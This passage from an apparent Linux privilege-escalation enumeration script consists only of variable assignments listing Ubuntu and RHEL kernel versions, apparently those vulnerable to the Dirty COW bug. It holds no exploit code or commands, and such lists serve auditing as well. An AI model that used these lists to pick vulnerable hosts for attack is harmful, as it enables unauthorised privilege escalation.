2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24"
    937 kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual"
    938 kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual"
    939 kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic"
    940 kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic"
    941 kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic"
    942 kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic"
    943 kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency"
    944 kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic"
    945 kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic"
    946 kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency"
    947 kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency"
    948 kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5"
    949 kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5"
    950 kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5"
    951 kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6"
    952 kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6"
